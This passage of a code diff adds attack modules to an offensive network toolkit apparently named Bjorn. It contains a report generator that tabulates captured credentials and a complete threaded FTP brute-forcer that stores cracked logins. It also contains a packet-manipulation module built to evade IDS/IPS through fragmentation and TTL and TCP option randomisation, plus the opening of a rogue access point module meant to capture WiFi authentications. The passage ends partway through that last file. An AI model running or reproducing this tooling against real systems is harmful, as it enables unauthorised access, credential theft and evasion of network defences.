        self.input_dir = input_dir
        self.output_dir = output_dir
        self.formats = formats or ['json', 'html', 'md']
        self.watch_mode = watch_mode
        self.clean = clean

        self.data = defaultdict(list)
        self.observer = None

    def clean_directories(self):
        """Clean output directory if requested."""
        if self.clean and os.path.exists(self.output_dir):
            shutil.rmtree(self.output_dir)
            os.makedirs(self.output_dir)
            logging.info(f"Cleaned output directory: {self.output_dir}")

    def collect_wifi_data(self):
        """Collect WiFi-related findings."""
        try:
            wifi_dir = os.path.join(self.input_dir, "wifi")
            if os.path.exists(wifi_dir):
                for file in glob.glob(os.path.join(wifi_dir, "*.json")):
                    with open(file, 'r') as f:
                        data = json.load(f)
                        self.data['wifi'].append(data)
        except Exception as e:
            logging.error(f"Error collecting WiFi data: {e}")

    def collect_network_data(self):
        """Collect network topology and host findings."""
        try:
            network_dir = os.path.join(self.input_dir, "topology")
            if os.path.exists(network_dir):
                for file in glob.glob(os.path.join(network_dir, "*.json")):
                    with open(file, 'r') as f:
                        data = json.load(f)
                        self.data['network'].append(data)
        except Exception as e:
            logging.error(f"Error collecting network data: {e}")

    def collect_vulnerability_data(self):
        """Collect vulnerability findings."""
        try:
            vuln_dir = os.path.join(self.input_dir, "webscan")
            if os.path.exists(vuln_dir):
                for file in glob.glob(os.path.join(vuln_dir, "*.json")):
                    with open(file, 'r') as f:
                        data = json.load(f)
                        self.data['vulnerabilities'].append(data)
        except Exception as e:
            logging.error(f"Error collecting vulnerability data: {e}")

    def collect_credential_data(self):
        """Collect credential findings."""
        try:
            cred_dir = os.path.join(self.input_dir, "packets")
            if os.path.exists(cred_dir):
                for file in glob.glob(os.path.join(cred_dir, "*.json")):
                    with open(file, 'r') as f:
                        data = json.load(f)
                        self.data['credentials'].append(data)
        except Exception as e:
            logging.error(f"Error collecting credential data: {e}")

    def collect_data(self):
        """Collect all data from various sources."""
        self.data.clear()  # Reset data before collecting
        self.collect_wifi_data()
        self.collect_network_data()
        self.collect_vulnerability_data()
        self.collect_credential_data()
        logging.info("Data collection completed")

    def generate_json_report(self):
        """Generate JSON format report."""
        try:
            report = {
                'timestamp': datetime.now().isoformat(),
                'findings': dict(self.data)
            }

            os.makedirs(self.output_dir, exist_ok=True)
            output_file = os.path.join(self.output_dir,
                                       f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")

            with open(output_file, 'w') as f:
                json.dump(report, f, indent=4)

            logging.info(f"JSON report saved to {output_file}")

        except Exception as e:
            logging.error(f"Error generating JSON report: {e}")

    def generate_html_report(self):
        """Generate HTML format report."""
        try:
            template = jinja2.Template(HTML_TEMPLATE)
            sections = []

            # Network Section
            if self.data['network']:
                content = "<h3>Network Topology</h3>"
                for topology in self.data['network']:
                    content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
                    content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
                    for ip, data in topology.get('hosts', {}).items():
                        ports = data.get('ports', [])
                        mac = data.get('mac', 'Unknown')
                        status = data.get('status', 'Unknown')
                        content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
                    content += "</table>"
                sections.append({"title": "Network Information", "content": content})

            # WiFi Section
            if self.data['wifi']:
                content = "<h3>WiFi Findings</h3>"
                for wifi_data in self.data['wifi']:
                    content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
                    for network in wifi_data.get('networks', []):
                        content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
                        content += f"<td>{network.get('bssid', 'Unknown')}</td>"
                        content += f"<td>{network.get('security', 'Unknown')}</td>"
                        content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
                        content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
                    content += "</table>"
                sections.append({"title": "WiFi Networks", "content": content})

            # Vulnerabilities Section
            if self.data['vulnerabilities']:
                content = "<h3>Discovered Vulnerabilities</h3>"
                for vuln_data in self.data['vulnerabilities']:
                    content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
                    for vuln in vuln_data.get('findings', []):
                        severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
                        content += f"<tr class='{severity_class}'>"
                        content += f"<td>{vuln.get('type', 'Unknown')}</td>"
                        content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
                        content += f"<td>{vuln.get('target', 'Unknown')}</td>"
                        content += f"<td>{vuln.get('description', 'No description')}</td>"
                        content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
                    content += "</table>"
                sections.append({"title": "Vulnerabilities", "content": content})

            # Credentials Section
            if self.data['credentials']:
                content = "<h3>Discovered Credentials</h3>"
                content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
                for cred_data in self.data['credentials']:
                    for cred in cred_data.get('credentials', []):
                        content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
                        content += f"<td>{cred.get('source', 'Unknown')}</td>"
                        content += f"<td>{cred.get('service', 'Unknown')}</td>"
                        content += f"<td>{cred.get('username', 'Unknown')}</td>"
                        content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
                content += "</table>"
                sections.append({"title": "Credentials", "content": content})

            # Generate HTML
            os.makedirs(self.output_dir, exist_ok=True)
            html = template.render(
                timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                sections=sections
            )

            output_file = os.path.join(self.output_dir,
                                       f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")

            with open(output_file, 'w') as f:
                f.write(html)

            logging.info(f"HTML report saved to {output_file}")

        except Exception as e:
            logging.error(f"Error generating HTML report: {e}")

    def generate_markdown_report(self):
        """Generate Markdown format report."""
        try:
            md_content = [
                "# Bjorn Reconnaissance Report",
                f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
            ]

            # Network Section
            if self.data['network']:
                md_content.append("## Network Information")
                for topology in self.data['network']:
                    md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
                    md_content.append("\n| IP | MAC | Open Ports | Status |")
                    md_content.append("|-------|-------|------------|---------|")
                    for ip, data in topology.get('hosts', {}).items():
                        ports = data.get('ports', [])
                        mac = data.get('mac', 'Unknown')
                        status = data.get('status', 'Unknown')
                        md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")

            # WiFi Section
            if self.data['wifi']:
                md_content.append("\n## WiFi Networks")
                md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
                md_content.append("|------|--------|-----------|---------|----------|")
                for wifi_data in self.data['wifi']:
                    for network in wifi_data.get('networks', []):
                        md_content.append(
                            f"| {network.get('ssid', 'Unknown')} | "
                            f"{network.get('bssid', 'Unknown')} | "
                            f"{network.get('security', 'Unknown')} | "
                            f"{network.get('signal_strength', 'Unknown')} | "
                            f"{network.get('channel', 'Unknown')} |"
                        )

            # Vulnerabilities Section
            if self.data['vulnerabilities']:
                md_content.append("\n## Vulnerabilities")
                md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
                md_content.append("|------|-----------|--------|-------------|----------------|")
                for vuln_data in self.data['vulnerabilities']:
                    for vuln in vuln_data.get('findings', []):
                        md_content.append(
                            f"| {vuln.get('type', 'Unknown')} | "
                            f"{vuln.get('severity', 'Unknown')} | "
                            f"{vuln.get('target', 'Unknown')} | "
                            f"{vuln.get('description', 'No description')} | "
                            f"{vuln.get('recommendation', 'No recommendation')} |"
                        )

            # Credentials Section
            if self.data['credentials']:
                md_content.append("\n## Discovered Credentials")
                md_content.append("\n| Type | Source | Service | Username | Timestamp |")
                md_content.append("|------|---------|----------|-----------|------------|")
                for cred_data in self.data['credentials']:
                    for cred in cred_data.get('credentials', []):
                        md_content.append(
                            f"| {cred.get('type', 'Unknown')} | "
                            f"{cred.get('source', 'Unknown')} | "
                            f"{cred.get('service', 'Unknown')} | "
                            f"{cred.get('username', 'Unknown')} | "
                            f"{cred.get('timestamp', 'Unknown')} |"
                        )

            os.makedirs(self.output_dir, exist_ok=True)
            output_file = os.path.join(self.output_dir,
                                       f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")

            with open(output_file, 'w') as f:
                f.write('\n'.join(md_content))

            logging.info(f"Markdown report saved to {output_file}")

        except Exception as e:
            logging.error(f"Error generating Markdown report: {e}")


    def generate_reports(self):
        """Generate reports in all specified formats."""
        os.makedirs(self.output_dir, exist_ok=True)

        if 'json' in self.formats:
            self.generate_json_report()
        if 'html' in self.formats:
            self.generate_html_report()
        if 'md' in self.formats:
            self.generate_markdown_report()

    def start_watching(self):
        """Start watching for new data files."""
        class FileHandler(watchdog.events.FileSystemEventHandler):
            def __init__(self, harvester):
                self.harvester = harvester

            def on_created(self, event):
                if event.is_directory:
                    return
                if event.src_path.endswith('.json'):
                    logging.info(f"New data file detected: {event.src_path}")
                    self.harvester.collect_data()
                    self.harvester.generate_reports()

        self.observer = watchdog.observers.Observer()
        self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
        self.observer.start()

        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            self.observer.stop()
        self.observer.join()

    def execute(self):
        """Execute the data collection and reporting process."""
        try:
            logging.info("Starting data collection")

            if self.clean:
                self.clean_directories()

            # Initial data collection and report generation
            self.collect_data()
            self.generate_reports()

            # Start watch mode if enabled
            if self.watch_mode:
                logging.info("Starting watch mode for new data")
                try:
                    self.start_watching()
                except KeyboardInterrupt:
                    logging.info("Watch mode stopped by user")
                finally:
                    if self.observer:
                        self.observer.stop()
                        self.observer.join()

            logging.info("Data collection and reporting completed")

        except Exception as e:
            logging.error(f"Error during execution: {e}")
            raise
        finally:
            # Ensure observer is stopped if watch mode was active
            if self.observer and self.observer.is_alive():
                self.observer.stop()
                self.observer.join()

def save_settings(input_dir, output_dir, formats, watch_mode, clean):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "input_dir": input_dir,
            "output_dir": output_dir,
            "formats": formats,
            "watch_mode": watch_mode,
            "clean": clean
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")

def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

def main():
    parser = argparse.ArgumentParser(description="Data collection and organization tool")
    parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
    parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
                        help="Output format")
    parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
    parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
    args = parser.parse_args()

    settings = load_settings()
    input_dir = args.input or settings.get("input_dir")
    output_dir = args.output or settings.get("output_dir")
    formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
    watch_mode = args.watch or settings.get("watch_mode", False)
    clean = args.clean or settings.get("clean", False)

    save_settings(input_dir, output_dir, formats, watch_mode, clean)

    harvester = FreyaHarvest(
        input_dir=input_dir,
        output_dir=output_dir,
        formats=formats,
        watch_mode=watch_mode,
        clean=clean
    )
    harvester.execute()

if __name__ == "__main__":
    main()
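
A minimal sketch of a one-shot programmatic run of the class above (my illustration, not part of the diff; requires watchdog, markdown, and jinja2, and assumes the Bjorn directory layout from the defaults in the diff):

    # Hypothetical one-shot usage of FreyaHarvest (illustration only): aggregate
    # existing findings and emit only a Markdown report, with watch mode off.
    from freya_harvest import FreyaHarvest

    harvester = FreyaHarvest(input_dir="/home/bjorn/Bjorn/data/output",
                             output_dir="/home/bjorn/Bjorn/data/reports",
                             formats=["md"], watch_mode=False, clean=False)
    harvester.execute()  # writes report_<timestamp>.md and returns
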
268
resources/default_config/actions/ftp_bruteforce.py
Normal file
@@ -0,0 +1,268 @@
|
||||
"""
|
||||
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='ftp')
|
||||
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
|
||||
"""
|
||||
|
||||
import os
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from ftplib import FTP
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "FTPBruteforce"
|
||||
b_module = "ftp_bruteforce"
|
||||
b_status = "brute_force_ftp"
|
||||
b_port = 21
|
||||
b_parent = None
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800, # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||

class FTPBruteforce:
    """Orchestrator wrapper -> FTPConnector."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.ftp_bruteforce = FTPConnector(shared_data)
        logger.info("FTPConnector initialized.")

    def bruteforce_ftp(self, ip, port):
        """Run the FTP bruteforce for (ip, port)."""
        return self.ftp_bruteforce.run_bruteforce(ip, port)

    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
        self.shared_data.bjorn_orch_status = "FTPBruteforce"
        # original behaviour: a small visual delay
        time.sleep(5)
        logger.info(f"Brute forcing FTP on {ip}:{port}...")
        success, results = self.bruteforce_ftp(ip, port)
        return 'success' if success else 'failed'


class FTPConnector:
    """Handles FTP attempts, DB persistence, and IP -> (MAC, hostname) mapping."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

        # Wordlists, unchanged from the original implementation
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)

        # Cache IP -> (mac, hostname)
        self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
        self._refresh_ip_identity_cache()

        self.lock = threading.Lock()
        self.results: List[List[str]] = []  # [mac, ip, hostname, user, password, port]
        self.queue = Queue()

    # ---------- file helpers ----------
    @staticmethod
    def _read_lines(path: str) -> List[str]:
        try:
            with open(path, "r", encoding="utf-8", errors="ignore") as f:
                return [l.rstrip("\n\r") for l in f if l.strip()]
        except Exception as e:
            logger.error(f"Cannot read file {path}: {e}")
            return []

    # ---------- DB hosts mapping ----------
    def _refresh_ip_identity_cache(self) -> None:
        self._ip_to_identity.clear()
        try:
            rows = self.shared_data.db.get_all_hosts()
        except Exception as e:
            logger.error(f"DB get_all_hosts failed: {e}")
            rows = []

        for r in rows:
            mac = r.get("mac_address") or ""
            if not mac:
                continue
            hostnames_txt = r.get("hostnames") or ""
            current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
            ips_txt = r.get("ips") or ""
            if not ips_txt:
                continue
            for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
                self._ip_to_identity[ip] = (mac, current_hn)

    def mac_for_ip(self, ip: str) -> Optional[str]:
        if ip not in self._ip_to_identity:
            self._refresh_ip_identity_cache()
        return self._ip_to_identity.get(ip, (None, None))[0]

    def hostname_for_ip(self, ip: str) -> Optional[str]:
        if ip not in self._ip_to_identity:
            self._refresh_ip_identity_cache()
        return self._ip_to_identity.get(ip, (None, None))[1]

    # ---------- FTP ----------
    def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
        try:
            conn = FTP()
            conn.connect(adresse_ip, 21)
            conn.login(user, password)
            try:
                conn.quit()
            except Exception:
                pass
            logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
            return True
        except Exception:
            return False
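    # Illustrative standalone use of the connector above (hypothetical, outside
    # the orchestrator), assuming a configured SharedData instance `sd`:
    #   connector = FTPConnector(sd)
    #   if connector.ftp_connect("192.168.1.50", "anonymous", "anonymous"):
    #       print("anonymous FTP login allowed")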

    # ---------- DB upsert fallback ----------
    def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
        mac_k = mac or ""
        ip_k = ip or ""
        user_k = user or ""
        db_k = database or ""
        port_k = int(port or 0)

        try:
            with self.shared_data.db.transaction(immediate=True):
                self.shared_data.db.execute(
                    """
                    INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
                    VALUES('ftp',?,?,?,?,?,?,?,NULL)
                    """,
                    (mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
                )
                self.shared_data.db.execute(
                    """
                    UPDATE creds
                    SET "password"=?,
                        hostname=COALESCE(?, hostname),
                        last_seen=CURRENT_TIMESTAMP
                    WHERE service='ftp'
                      AND COALESCE(mac_address,'')=?
                      AND COALESCE(ip,'')=?
                      AND COALESCE("user",'')=?
                      AND COALESCE("database",'')=?
                      AND COALESCE(port,0)=?
                    """,
                    (password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
                )
        except Exception as e:
            logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")

    # ---------- worker / queue ----------
    def worker(self, success_flag):
        """Worker thread for FTP bruteforce attempts."""
        while not self.queue.empty():
            if self.shared_data.orchestrator_should_exit:
                logger.info("Orchestrator exit signal received, stopping worker thread.")
                break

            adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
            try:
                if self.ftp_connect(adresse_ip, user, password):
                    with self.lock:
                        self.results.append([mac_address, adresse_ip, hostname, user, password, port])
                    logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
                    self.save_results()
                    self.removeduplicates()
                    success_flag[0] = True
            finally:
                self.queue.task_done()

            # Configurable pause between FTP attempts
            if getattr(self.shared_data, "timewait_ftp", 0) > 0:
                time.sleep(self.shared_data.timewait_ftp)

    def run_bruteforce(self, adresse_ip: str, port: int):
        mac_address = self.mac_for_ip(adresse_ip)
        hostname = self.hostname_for_ip(adresse_ip) or ""

        total_tasks = len(self.users) * len(self.passwords) + 1  # (original logic kept)
        if len(self.users) * len(self.passwords) == 0:
            logger.warning("No users/passwords loaded. Abort.")
            return False, []

        for user in self.users:
            for password in self.passwords:
                if self.shared_data.orchestrator_should_exit:
                    logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
                    return False, []
                self.queue.put((adresse_ip, user, password, mac_address, hostname, port))

        success_flag = [False]
        threads = []
        thread_count = min(40, max(1, len(self.users) * len(self.passwords)))

        for _ in range(thread_count):
            t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
            t.start()
            threads.append(t)

        while not self.queue.empty():
            if self.shared_data.orchestrator_should_exit:
                logger.info("Orchestrator exit signal received, stopping bruteforce.")
                while not self.queue.empty():
                    try:
                        self.queue.get_nowait()
                        self.queue.task_done()
                    except Exception:
                        break
                break
            time.sleep(0.2)  # avoid busy-waiting while workers drain the queue

        self.queue.join()
        for t in threads:
            t.join()

        return success_flag[0], self.results

    # ---------- DB persistence ----------
    def save_results(self):
        for mac, ip, hostname, user, password, port in self.results:
            try:
                self.shared_data.db.insert_cred(
                    service="ftp",
                    mac=mac,
                    ip=ip,
                    hostname=hostname,
                    user=user,
                    password=password,
                    port=port,
                    database=None,
                    extra=None
                )
            except Exception as e:
                if "ON CONFLICT clause does not match" in str(e):
                    self._fallback_upsert_cred(
                        mac=mac, ip=ip, hostname=hostname, user=user,
                        password=password, port=port, database=None
                    )
                else:
                    logger.error(f"insert_cred failed for {ip} {user}: {e}")
        self.results = []

    def removeduplicates(self):
        # No-op: the DB upsert path above already prevents duplicate rows.
        pass


if __name__ == "__main__":
    try:
        sd = SharedData()
        ftp_bruteforce = FTPBruteforce(sd)
        logger.info("FTP brute force module ready.")
        exit(0)
    except Exception as e:
        logger.error(f"Error: {e}")
        exit(1)
318
resources/default_config/actions/heimdall_guard.py
Normal file
@@ -0,0 +1,318 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Network interface to use (default: active interface).
# -m, --mode Operating mode (timing, random, fragmented, all).
# -d, --delay Base delay between operations in seconds (default: 1).
# -r, --randomize Randomization factor for timing (default: 0.5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).

import os
import json
import argparse
from datetime import datetime
import logging
import random
import subprocess  # used by initialize_interface(); was missing from the original imports
import time
import socket
import struct
import threading
from scapy.all import *
from collections import deque

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')


b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_enabled = 0

# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")

class HeimdallGuard:
    def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
        self.interface = interface
        self.mode = mode
        self.base_delay = base_delay
        self.random_factor = random_factor
        self.output_dir = output_dir

        self.packet_queue = deque()
        self.active = False
        self.lock = threading.Lock()

        # Statistics
        self.stats = {
            'packets_processed': 0,
            'packets_fragmented': 0,
            'timing_adjustments': 0
        }

    def initialize_interface(self):
        """Configure network interface for stealth operations."""
        try:
            # Disable NIC offloading features that might interfere with packet manipulation
            commands = [
                f"ethtool -K {self.interface} tso off",  # TCP segmentation offload
                f"ethtool -K {self.interface} gso off",  # Generic segmentation offload
                f"ethtool -K {self.interface} gro off",  # Generic receive offload
                f"ethtool -K {self.interface} lro off"   # Large receive offload
            ]

            for cmd in commands:
                try:
                    subprocess.run(cmd.split(), check=True)
                except subprocess.CalledProcessError:
                    logging.warning(f"Failed to execute: {cmd}")

            logging.info(f"Interface {self.interface} configured for stealth operations")
            return True

        except Exception as e:
            logging.error(f"Failed to initialize interface: {e}")
            return False

    def calculate_timing(self):
        """Calculate timing delays with randomization."""
        base = self.base_delay
        variation = self.random_factor * base
        return max(0, base + random.uniform(-variation, variation))
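    # Worked example of the jitter above: with base_delay=1 and
    # random_factor=0.5, variation=0.5, so each delay is drawn uniformly
    # from [0.5, 1.5] seconds (clamped at 0 for larger factors).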
    def fragment_packet(self, packet, mtu=1500):
        """Fragment packets to avoid detection patterns."""
        try:
            if IP in packet:
                # Fragment IP packets
                frags = []
                payload = bytes(packet[IP].payload)
                header_length = len(packet) - len(payload)
                max_size = mtu - header_length

                # Create fragments
                offset = 0
                while offset < len(payload):
                    frag_size = min(max_size, len(payload) - offset)
                    frag_payload = payload[offset:offset + frag_size]

                    # Create fragment packet
                    frag = packet.copy()
                    frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
                    frag[IP].frag = offset // 8
                    frag[IP].payload = Raw(frag_payload)

                    frags.append(frag)
                    offset += frag_size

                return frags
            return [packet]

        except Exception as e:
            logging.error(f"Error fragmenting packet: {e}")
            return [packet]
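    # Minimal sketch of driving the fragmenter directly (assumes scapy and
    # root privileges; the `guard` instance name is illustrative):
    #   pkt = IP(dst="192.168.1.10")/TCP(dport=80)/Raw(b"A" * 3000)
    #   frags = guard.fragment_packet(pkt, mtu=1500)
    #   # each fragment carries at most (mtu - header_length) payload bytes,
    #   # with the MF flag set on all but the last fragment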
    def randomize_ttl(self, packet):
        """Randomize TTL values to avoid fingerprinting."""
        if IP in packet:
            ttl_values = [32, 64, 128, 255]  # Common TTL values
            packet[IP].ttl = random.choice(ttl_values)
        return packet

    def modify_tcp_options(self, packet):
        """Modify TCP options to avoid fingerprinting."""
        if TCP in packet:
            # Common window sizes
            window_sizes = [8192, 16384, 32768, 65535]
            packet[TCP].window = random.choice(window_sizes)

            # Randomize TCP options
            tcp_options = []

            # MSS option
            mss_values = [1400, 1460, 1440]
            tcp_options.append(('MSS', random.choice(mss_values)))

            # Window scale
            if random.random() < 0.5:
                tcp_options.append(('WScale', random.randint(0, 14)))

            # SACK permitted
            if random.random() < 0.5:
                tcp_options.append(('SAckOK', ''))

            packet[TCP].options = tcp_options

        return packet

    def process_packet(self, packet):
        """Process a packet according to stealth settings."""
        processed_packets = []

        try:
            if self.mode in ['all', 'fragmented']:
                fragments = self.fragment_packet(packet)
                processed_packets.extend(fragments)
                self.stats['packets_fragmented'] += len(fragments) - 1
            else:
                processed_packets.append(packet)

            # Apply additional stealth techniques
            final_packets = []
            for pkt in processed_packets:
                pkt = self.randomize_ttl(pkt)
                pkt = self.modify_tcp_options(pkt)
                final_packets.append(pkt)

            self.stats['packets_processed'] += len(final_packets)
            return final_packets

        except Exception as e:
            logging.error(f"Error processing packet: {e}")
            return [packet]

    def send_packet(self, packet):
        """Send packet with timing adjustments."""
        try:
            if self.mode in ['all', 'timing']:
                delay = self.calculate_timing()
                time.sleep(delay)
                self.stats['timing_adjustments'] += 1

            send(packet, iface=self.interface, verbose=False)

        except Exception as e:
            logging.error(f"Error sending packet: {e}")

    def packet_processor_thread(self):
        """Process packets from the queue."""
        while self.active:
            try:
                if self.packet_queue:
                    packet = self.packet_queue.popleft()
                    processed_packets = self.process_packet(packet)

                    for processed in processed_packets:
                        self.send_packet(processed)
                else:
                    time.sleep(0.1)

            except Exception as e:
                logging.error(f"Error in packet processor thread: {e}")

    def start(self):
        """Start stealth operations."""
        if not self.initialize_interface():
            return False

        self.active = True
        self.processor_thread = threading.Thread(target=self.packet_processor_thread)
        self.processor_thread.start()
        return True

    def stop(self):
        """Stop stealth operations."""
        self.active = False
        if hasattr(self, 'processor_thread'):
            self.processor_thread.join()
        self.save_stats()

    def queue_packet(self, packet):
        """Queue a packet for processing."""
        self.packet_queue.append(packet)

    def save_stats(self):
        """Save operation statistics."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

            stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")

            with open(stats_file, 'w') as f:
                json.dump({
                    'timestamp': datetime.now().isoformat(),
                    'interface': self.interface,
                    'mode': self.mode,
                    'stats': self.stats
                }, f, indent=4)

            logging.info(f"Statistics saved to {stats_file}")

        except Exception as e:
            logging.error(f"Failed to save statistics: {e}")

def save_settings(interface, mode, base_delay, random_factor, output_dir):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "interface": interface,
            "mode": mode,
            "base_delay": base_delay,
            "random_factor": random_factor,
            "output_dir": output_dir
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")

def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

def main():
    parser = argparse.ArgumentParser(description="Stealth operations module")
    parser.add_argument("-i", "--interface", help="Network interface to use")
    parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
                        default='all', help="Operating mode")
    parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
    parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    args = parser.parse_args()

    settings = load_settings()
    interface = args.interface or settings.get("interface")
    mode = args.mode or settings.get("mode")
    base_delay = args.delay or settings.get("base_delay")
    random_factor = args.randomize or settings.get("random_factor")
    output_dir = args.output or settings.get("output_dir")

    if not interface:
        interface = conf.iface
        logging.info(f"Using default interface: {interface}")

    save_settings(interface, mode, base_delay, random_factor, output_dir)

    guard = HeimdallGuard(
        interface=interface,
        mode=mode,
        base_delay=base_delay,
        random_factor=random_factor,
        output_dir=output_dir
    )

    try:
        if guard.start():
            logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
            while True:
                time.sleep(1)
    except KeyboardInterrupt:
        logging.info("Stopping Heimdall Guard...")
        guard.stop()

if __name__ == "__main__":
    main()
14
resources/default_config/actions/idle.py
Normal file
@@ -0,0 +1,14 @@
from shared import SharedData

b_class = "IDLE"
b_module = "idle"
b_status = "IDLE"


class IDLE:
    def __init__(self, shared_data):
        self.shared_data = shared_data
467
resources/default_config/actions/loki_deceiver.py
Normal file
@@ -0,0 +1,467 @@
# WiFi deception tool for creating malicious access points and capturing authentications.
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Wireless interface for AP creation (default: wlan0).
# -s, --ssid SSID for the fake access point (or target to clone).
# -c, --channel WiFi channel (default: 6).
# -p, --password Optional password for WPA2 AP.
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).

import os
import json
import re  # used by get_interface_mac(); was missing from the original imports
import argparse
from datetime import datetime
import logging
import subprocess
import signal
import time
import threading
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
from scapy.layers.eap import EAPOL  # used by process_packet(); was missing


b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_enabled = 0

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
